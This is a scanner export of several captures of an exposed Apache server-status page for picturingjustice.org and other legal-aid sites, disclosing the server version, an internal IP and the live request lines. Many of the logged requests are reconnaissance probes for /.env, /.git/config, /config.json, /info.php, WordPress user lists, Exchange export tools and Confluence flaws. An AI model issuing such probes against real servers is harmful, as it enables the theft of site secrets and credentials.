::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-54285250/5/9780_ 0.241400.00.04403.59 70.132.63.132http/1.1short.alas.org:8080GET / HTTP/1.1 30-54285260/5/10667_ 0.311300.00.05492.76 70.132.63.132http/1.1survey.alas.org:8080GET /.DS_Store HTTP/1.1 31-54285270/4/9053_ 0.331300.00.08376.45 70.132.63.132http/1.1survey.alas.org:8080GET /.git/config HTTP/1.1 32-54285280/5/10172_ 0.1535210.00.09452.37 70.132.63.80http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 33-54285330/3/10594_ 1.011519470.00.00457.74 130.176.17.72http/1.1events.alas.org:8080POST /wp-cron.php?doing_wp_cron=1660781161.01912903785705566406 34-54-0/0/10174. 0.541300.00.00466.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-54285590/2/10774_ 0.58123260.00.03445.11 130.176.137.155http/1.1gwinnettfamilylawclinic.org:808POST /wp-login.php HTTP/1.1 36-54-0/0/9041. 0.531700.00.00379.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-54285693/5/10091K 0.72007.50.01404.91 70.132.63.132http/1.1picturingjustice.org:8080GET / HTTP/1.1 38-54285700/3/8217_ 0.6433900.00.15401.63 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 39-54285910/2/9920_ 0.551300.00.02383.62 204.246.166.105http/1.1short.alas.org:8080GET / HTTP/1.1 40-54-0/0/10176. 0.27300.00.00360.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-54286010/7/2156_ 0.4101330.00.2678.92 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 42-54286025/6/1048K 0.640087.90.0940.33 70.132.63.132http/1.1picturingjustice.org:8080GET /.env HTTP/1.1 43-54286030/5/1039_ 0.281300.00.0545.03 204.246.166.105http/1.1on.alas.org:8080GET / HTTP/1.1 44-54286043/4/635K 0.60007.50.0371.16 70.132.63.132http/1.1picturingjustice.org:8080GET / HTTP/1.1 45-54286056/7/994K 0.640091.40.0953.02 70.132.63.132http/1.1picturingjustice.org:8080GET /telescope/requests HTTP/1.1 46-54286060/3/685_ 0.6633230.00.1517.30 70.132.63.165http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 47-54286070/4/1013_ 0.161210340.00.0546.81 70.132.63.132http/1.1survey.alas.org:8080GET /telescope/requests HTTP/1.1 48-54-0/0/688. 0.401500.00.0020.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-54286090/5/699_ 0.191211770.00.0521.45 70.132.63.132http/1.1survey.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 50-54286100/8/631_ 0.081211130.00.0128.45 70.132.63.132http/1.1survey.alas.org:8080GET /server-status HTTP/1.1 51-54286431/4/742K 0.66011.50.1127.37 15.158.43.200http/1.1picturingjustice.org:8080GET / HTTP/1.1 52-54286480/6/685_ 0.13114580.00.0421.08 70.132.63.132http/1.1survey.alas.org:8080GET /login.action HTTP/1.1 53-54286491/8/502K 0.0731382.90.0120.15 70.132.63.165http/1.1gwinnettfamilylawclinic.org:808GET /server-status HTTP/1.1<
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3148fbd97948fbd97915605ea1
Apache Status Apache Server Status for www.picturingjustice.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2022-06-23T12:51:37 Current Time: Thursday, 18-Aug-2022 00:06:25 UTC Restart Time: Friday, 24-Jun-2022 06:43:41 UTC Parent Server Config. Generation: 55 Parent Server MPM Generation: 54 Server uptime: 54 days 17 hours 22 minutes 44 seconds Server load: 5.87 1.77 0.61 Total accesses: 2348688 - Total Traffic: 111.6 GB CPU Usage: u70.63 s10.09 cu0 cs0 - .00171% CPU load .497 requests/sec - 24.8 kB/second - 49.8 kB/request 34 requests currently being processed, 90 idle workers _KK___.KKK____K_.KK____._KK_..K__K._.__K.__KK___.__K___K_K__._.K K._..______________________.K_W___K_._.KK_.K_.CK_._..__.______._ ___.K.__K_K________KKK Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-54284390/13/149116_ 1.121910460.00.117129.90 70.132.63.132http/1.1survey.alas.org:8080GET /s/31332e3232342e3138392e3734/_/;/META-INF/maven/com.atlass 1-54282742/26/146315K 0.72002.30.487406.39 70.132.63.132http/1.1picturingjustice.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-54282792/24/138692K 2.39113.30.406786.85 70.132.63.132http/1.1legalaidconnections.org:8080GET / HTTP/1.1 3-54284440/4/138060_ 1.06102550.00.116843.78 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 4-54284510/6/132815_ 1.271911170.00.276872.45 70.132.63.132http/1.1survey.alas.org:8080GET / HTTP/1.1 5-54277790/79/127554_ 6.3893710.02.146306.05 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 6-54-0/0/123208. 1.971100.00.006154.80 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 7-54279602/58/116766K 5.53402.11.125991.82 15.158.43.200http/1.1picturingjustice.org:8080GET /config.json HTTP/1.1 8-54284281/9/111213K 2.504042.70.095413.86 15.158.43.200http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 9-54284522/12/109803K 1.540183.10.225360.63 130.176.29.140http/1.1legalaidconnections.org:8080GET / HTTP/1.1 10-54284610/7/103120_ 1.2571260.00.174844.88 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 11-54284620/8/90827_ 0.54184790.00.084417.14 70.132.63.132http/1.1survey.alas.org:8080GET /config.json HTTP/1.1 12-54284630/8/81752_ 0.74100.00.084061.28 70.132.63.132http/1.1picturingjustice.org:8080GET /s/31332e3232342e3138392e3236/_/;/META-INF/maven/com.atlass 13-54283940/11/76026_ 1.291911000.00.033612.15 70.132.63.132http/1.1survey.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 14-54277901/77/71387K 6.94421.53.333478.01 15.158.43.200http/1.1picturingjustice.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 15-54284640/12/68080_ 0.4585250.00.083513.42 130.176.211.201http/1.1atlantalegalaid.org:8080HEAD / HTTP/1.1 16-54-0/0/58815. 1.31400.00.002692.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-54283059/24/48141K 1.990094.70.552319.89 70.132.63.132http/1.1picturingjustice.org:8080GET /.DS_Store HTTP/1.1 18-54284821/4/44104K 0.55101.10.002305.00 70.132.63.132http/1.1legalaidconnections.org:8080GET /.DS_Store HTTP/1.1 19-54284830/6/40560_ 1.252610.00.221989.78 70.132.63.80http/1.1gwinnettfamilylawclinic.org:808GET /config.json HTTP/1.1 20-54284880/4/41159_ 0.5751630.00.012010.74 70.132.63.165http/1.1gwinnettfamilylawclinic.org:808GET /telescope/requests HTTP/1.1 21-54284890/13/35255_ 0.35100.00.171734.06 70.132.63.132http/1.1picturingjustice.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 22-54284900/6/38400_ 0.59100.00.011750.95 70.132.63.132http/1.1picturingjustice.org:8080GET / HTTP/1.1 23-54-0/0/34537. 1.32800.00.001616.61 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-54284920/8/31223_ 0.683930.00.061522.01 130.176.137.155http/1.1gwinnettfamilylawclinic.org:808GET /?rest_route=/wp/v2/users/ HTTP/1.1 25-54285211/9/16891K 0.10401.00.05728.46 15.158.43.200http/1.1picturingjustice.org:8080GET /info.php HTTP/1.1 26-54285222/11/11335K 0.10003.20.06570.90 70.132.63.80http/1.1picturingjustice.org:8080GET / HTTP/1.1 27-54285230/8/11706_ 0.101912810.00.01472.33 70.132.63.132http/1.1survey.alas.org:8080GET /info.php HTTP/1.1 28-54-0/0/9877. 0.532100.00.00430.06 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-54-0/0/9781. 0.24300.00.00403.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-54285262/7/10669K 0.31002.70.05492.76 70.132.63.132http/1.1picturingjustice.org:8080GET /.git/config HTTP/1.1 31-54285270/4/9053_ 0.332000.00.08376.45 70.132.63.132http/1.1survey.alas.org:8080GET /.git/config HTTP/1.1 32-54285280/5/10172_ 0.15105210.00.09452.37 70.132.63.80http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 33-54285332/5/10596K 1.02402.10.00457.74 15.158.43.200http/1.1picturingjustice.org:8080GET /login.action HTTP/1.1 34-54-0/0/10174. 0.542000.00.00466.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-54285590/2/10774_ 0.58193260.00.03445.11 130.176.137.155http/1.1gwinnettfamilylawclinic.org:808POST /wp-login.php HTTP/1.1 36-54-0/0/9041. 0.532400.00.00379.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-54285690/5/10091_ 0.72100.00.01404.91 70.132.63.132http/1.1picturingjustice.org:8080GET / HTTP/1.1 38-54285700/3/8217_ 0.64103900.00.15401.63 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 39-54285911/3/9921K 0.55101.10.02383.62 70.132.63.132http/1.1legalaidconnections.org:8080GET /s/31332e3232342e3138392e3734/_/;/META-INF/maven/com.atlass 40-54-0/0/10176. 0.271000.00.00360.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-54286010/7/2156_ 0.4171330.00.2678.92 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 42-54286020/7/1049_ 0.64100.00.0940.33 70.132.63.132http/1.1picturingjustice.org:8080GET / HTTP/1.1 43-54286031/6/1040K 0.28101.10.0545.03 70.132.63.132http/1.1legalaidconnections.org:8080GET /info.php HTTP/1.1 44-54286047/8/639K 0.650091.10.1171.24 70.132.63.132http/1.1picturingjustice.org:8080GET /info.php HTTP/1.1 45-54286050/8/995_ 0.64100.00.0953.02 70.132.63.132http/1.1picturingjustice.org:8080GET / HTTP/1.1 46-54286060/3/685_ 0.66103230.00.1517.30 70.132.63.165http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 47-54286070/4/1013_ 0.161910340.00.0546.81 70.132.63.132http/1.1survey.alas.org:8080GET /telescope/requests HTTP/1.1 48-54-0/0/688. 0.402200.00.0020.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-54286090/5/699_ 0.191911770.00.0521.45 70.132.63.132http/1.1survey.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 50-54286100/8/631_ 0.081911130.00.0128.45 70.132.63.132http/1.1survey.alas.org:8080GET /server-status HTTP/1.1 51-54286433/6/744K 0.66403.70.1227.37 15.158.43.200http/1.1picturingjustice.org:8080GET /s/35322e32312e3230392e3738/_/;/META-INF/maven/com.atlassia 52-54286480/6/685_ 0.13184580.00.0421.08 70.132.63.132http/1.1survey.alas.org:8080GET /login.action HTTP/1.1 53-54286490/8/502_ 0.0751380.0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3148fbd97948fbd97977640bea
Apache Status Apache Server Status for www.picturingjustice.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2022-03-16T16:53:42 Current Time: Sunday, 19-Jun-2022 00:04:28 UTC Restart Time: Saturday, 19-Mar-2022 06:12:47 UTC Parent Server Config. Generation: 93 Parent Server MPM Generation: 92 Server uptime: 91 days 17 hours 51 minutes 41 seconds Server load: 0.08 0.02 0.01 Total accesses: 4334449 - Total Traffic: 195.9 GB CPU Usage: u117.92 s12.17 cu0 cs0 - .00164% CPU load .547 requests/sec - 25.9 kB/second - 47.4 kB/request 13 requests currently being processed, 0 idle workers KKWWK.KKKKK..K.K.....K.......................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-92121631/1/276493K 0.00101.10.0013137.88 70.132.1.80http/1.1picturingjustice.org:8080GET /s/3134332e3230342e38392e3233/_/;/META-INF/maven/com.atlass 1-92120411/12/270920K 0.30101.60.1612701.83 70.132.1.81http/1.1picturingjustice.org:8080GET / HTTP/1.1 2-92121680/0/266309W 0.00000.00.0012755.69 70.132.1.80http/1.1picturingjustice.org:8080GET / HTTP/1.1 3-92121690/0/252871W 0.00000.00.0011597.37 70.132.1.80http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 4-92119273/38/245950K 2.97117.51.2211161.77 70.132.1.80http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 5-92-0/0/236728. 4.1859500.00.0010921.63 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 6-92111453/110/223978K 8.75103.54.8310562.75 70.132.1.80http/1.1picturingjustice.org:8080GET /.env HTTP/1.1 7-92120562/11/216026K 0.90102.10.1210106.08 70.132.1.80http/1.1picturingjustice.org:8080GET /s/3134332e3230342e38392e3835/_/;/META-INF/maven/com.atlass 8-92116181/79/207388K 4.38101.03.589424.49 70.132.1.80http/1.1picturingjustice.org:8080GET /.git/config HTTP/1.1 9-92111551/133/196831K 10.88101.54.519262.61 70.132.60.147http/1.1picturingjustice.org:8080GET / HTTP/1.1 10-92119281/31/183423K 2.60101.00.788455.33 70.132.1.80http/1.1picturingjustice.org:8080GET /telescope/requests HTTP/1.1 11-92-0/0/164358. 0.0060500.00.007891.88 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-92-0/0/158048. 0.0060400.00.007066.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-92119433/30/153075K 2.36104.01.187022.61 70.132.1.80http/1.1picturingjustice.org:8080GET / HTTP/1.1 14-92-0/0/142076. 0.0060300.00.006207.60 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-92116403/61/121082K 5.48104.12.115772.46 70.132.1.80http/1.1picturingjustice.org:8080GET /telescope/requests HTTP/1.1 16-92-0/0/107507. 0.00123500.00.005179.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-92-0/0/92548. 0.00123400.00.004262.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-92-0/0/81010. 0.00123300.00.003482.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-92-0/0/79012. 0.00123200.00.003620.23 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-92-0/0/77287. 0.00123000.00.003566.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-92119744/30/74259K 2.68105.90.323257.78 70.132.1.80http/1.1picturingjustice.org:8080GET / HTTP/1.1 22-92-0/0/70337. 0.00122900.00.003161.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-92-0/0/66665. 2.45122800.00.002933.52 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-92-0/0/57308. 0.00123100.00.002564.05 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-92-0/0/24577. 0.002121100.00.001165.19 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-92-0/0/18933. 0.002121000.00.00848.13 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-92-0/0/19665. 1.212056800.00.00900.02 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-92-0/0/16954. 0.002120900.00.00915.17 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-92-0/0/16249. 0.002120800.00.00836.49 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-92-0/0/18129. 2.471966300.00.00736.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-92-0/0/16360. 0.002120700.00.00783.78 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-92-0/0/14844. 0.002120600.00.00681.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-92-0/0/16373. 0.002120500.00.00735.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-92-0/0/15954. 0.002120400.00.00756.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-92-0/0/16362. 0.002120300.00.00875.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 36-92-0/0/14649. 4.261934200.00.00644.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-92-0/0/14861. 0.002120200.00.00641.47 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-92-0/0/15343. 2.951980300.00.00663.05 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-92-0/0/15716. 0.002120100.00.00657.97 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-92-0/0/13792. 4.681903200.00.00631.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-91-0/0/3731. 0.009895600.00.00138.19 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-91-0/0/2032. 0.009895500.00.0095.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-91-0/0/2110. 3.7312021900.00.0079.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-91-0/0/1440. 0.4112077300.00.0061.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-91-0/0/1566. 0.0012079600.00.0061.34 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-91-0/0/962. 0.0012077500.00.0038.88 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-91-0/0/943. 0.0012079700.00.0031.75 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-91-0/0/864. 0.0012079500.00.0042.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-91-0/0/1573. 0.1512077400.00.0042.86 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-90-0/0/987. 0.2816672700.00.00105.11 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-90-0/0/1149. 0.2616673400.00.0056.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-90-0/0/1038. 0.1616674300.00.0049.06 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-90-0/0/1045. 0.2816672900.00.0044.30 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-90-0/0/1009. 0.3116671800.00.0049.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-90-0/0/543. 0.2816673100.00.0034.22 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-90-0/0/1131. 0.3016672100.00.00<
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3148fbd97948fbd97984d52b82
Apache Status Apache Server Status for www.picturingjustice.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2022-03-16T16:53:42 Current Time: Sunday, 19-Jun-2022 00:04:27 UTC Restart Time: Saturday, 19-Mar-2022 06:12:47 UTC Parent Server Config. Generation: 93 Parent Server MPM Generation: 92 Server uptime: 91 days 17 hours 51 minutes 40 seconds Server load: 0.08 0.02 0.01 Total accesses: 4334444 - Total Traffic: 195.9 GB CPU Usage: u120.8 s12.51 cu0 cs0 - .00168% CPU load .547 requests/sec - 25.9 kB/second - 47.4 kB/request 10 requests currently being processed, 0 idle workers .K..W.KKKKK..K.K.....K.......................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-92-0/0/276492. 3.2259600.00.0013137.88 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 1-92120411/12/270920K 0.30001.60.1612701.83 70.132.1.81http/1.1picturingjustice.org:8080GET / HTTP/1.1 2-92-0/0/266309. 0.0060600.00.0012755.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 3-92-0/0/252871. 0.0060500.00.0011597.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 4-92119272/37/245949W 2.97002.51.2211161.76 70.132.1.80http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 5-92-0/0/236728. 4.1859400.00.0010921.63 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 6-92111453/110/223978K 8.75003.54.8310562.75 70.132.1.80http/1.1picturingjustice.org:8080GET /.env HTTP/1.1 7-92120561/10/216025K 0.90001.00.1210106.08 70.132.1.80http/1.1picturingjustice.org:8080GET /info.php HTTP/1.1 8-92116181/79/207388K 4.38001.03.589424.49 70.132.1.80http/1.1picturingjustice.org:8080GET /.git/config HTTP/1.1 9-92111551/133/196831K 10.88001.54.519262.61 70.132.60.147http/1.1picturingjustice.org:8080GET / HTTP/1.1 10-92119281/31/183423K 2.60001.00.788455.33 70.132.1.80http/1.1picturingjustice.org:8080GET /telescope/requests HTTP/1.1 11-92-0/0/164358. 0.0060400.00.007891.88 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-92-0/0/158048. 0.0060300.00.007066.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-92119432/29/153074K 2.36002.51.187022.61 70.132.1.80http/1.1picturingjustice.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 14-92-0/0/142076. 0.0060200.00.006207.60 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-92116403/61/121082K 5.48004.12.115772.46 70.132.1.80http/1.1picturingjustice.org:8080GET /telescope/requests HTTP/1.1 16-92-0/0/107507. 0.00123300.00.005179.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-92-0/0/92548. 0.00123200.00.004262.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-92-0/0/81010. 0.00123100.00.003482.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-92-0/0/79012. 0.00123000.00.003620.23 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-92-0/0/77287. 0.00122800.00.003566.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-92119743/29/74258K 2.68004.40.323257.78 70.132.1.80http/1.1picturingjustice.org:8080GET / HTTP/1.1 22-92-0/0/70337. 0.00122700.00.003161.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-92-0/0/66665. 2.45122600.00.002933.52 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-92-0/0/57308. 0.00122900.00.002564.05 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-92-0/0/24577. 0.002121000.00.001165.19 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-92-0/0/18933. 0.002120900.00.00848.13 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-92-0/0/19665. 1.212056600.00.00900.02 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-92-0/0/16954. 0.002120800.00.00915.17 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-92-0/0/16249. 0.002120700.00.00836.49 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-92-0/0/18129. 2.471966100.00.00736.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-92-0/0/16360. 0.002120600.00.00783.78 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-92-0/0/14844. 0.002120500.00.00681.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-92-0/0/16373. 0.002120400.00.00735.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-92-0/0/15954. 0.002120300.00.00756.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-92-0/0/16362. 0.002120200.00.00875.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 36-92-0/0/14649. 4.261934100.00.00644.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-92-0/0/14861. 0.002120100.00.00641.47 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-92-0/0/15343. 2.951980100.00.00663.05 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-92-0/0/15716. 0.002120000.00.00657.97 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-92-0/0/13792. 4.681903000.00.00631.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-91-0/0/3731. 0.009895500.00.00138.19 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-91-0/0/2032. 0.009895400.00.0095.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-91-0/0/2110. 3.7312021700.00.0079.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-91-0/0/1440. 0.4112077200.00.0061.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-91-0/0/1566. 0.0012079500.00.0061.34 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-91-0/0/962. 0.0012077400.00.0038.88 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-91-0/0/943. 0.0012079600.00.0031.75 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-91-0/0/864. 0.0012079400.00.0042.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-91-0/0/1573. 0.1512077300.00.0042.86 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-90-0/0/987. 0.2816672600.00.00105.11 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-90-0/0/1149. 0.2616673300.00.0056.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-90-0/0/1038. 0.1616674200.00.0049.06 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-90-0/0/1045. 0.2816672800.00.0044.30 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-90-0/0/1009. 0.3116671700.00.0049.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-90-0/0/543. 0.2816673000.00.0034.22 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-90-0/0/1131. 0.3016672000.00.0044.78 ::1http/1.1atlantalegalaid.org:8080
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3148fbd97948fbd97959187c36
Apache Status Apache Server Status for www.picturingjustice.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2022-03-16T16:53:42 Current Time: Sunday, 19-Jun-2022 00:04:34 UTC Restart Time: Saturday, 19-Mar-2022 06:12:47 UTC Parent Server Config. Generation: 93 Parent Server MPM Generation: 92 Server uptime: 91 days 17 hours 51 minutes 47 seconds Server load: 0.15 0.04 0.01 Total accesses: 4334488 - Total Traffic: 195.9 GB CPU Usage: u108.82 s11 cu0 cs0 - .00151% CPU load .547 requests/sec - 25.9 kB/second - 47.4 kB/request 22 requests currently being processed, 18 idle workers ___KKK____KKK_K_WKKKK_KKKKKKK.CKW________....................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-92121630/2/276494_ 0.00000.00.0013137.88 70.132.1.80http/1.1picturingjustice.org:8080GET /config.json HTTP/1.1 1-92120410/12/270920_ 0.30200.00.1612701.83 70.132.1.81http/1.1picturingjustice.org:8080GET / HTTP/1.1 2-92121680/2/266311_ 0.00000.00.0012755.69 70.132.1.80http/1.1picturingjustice.org:8080GET /login.action HTTP/1.1 3-92121692/2/252873K 0.00306.00.0111597.37 70.132.1.80http/1.1picturingjustice.org:8080GET /config.json HTTP/1.1 4-92119275/40/245952K 2.970010.21.2311161.77 70.132.1.80http/1.1picturingjustice.org:8080GET /s/3134332e3230342e38392e3539/_/;/META-INF/maven/com.atlass 5-92121782/2/236730K 0.00002.90.0010921.63 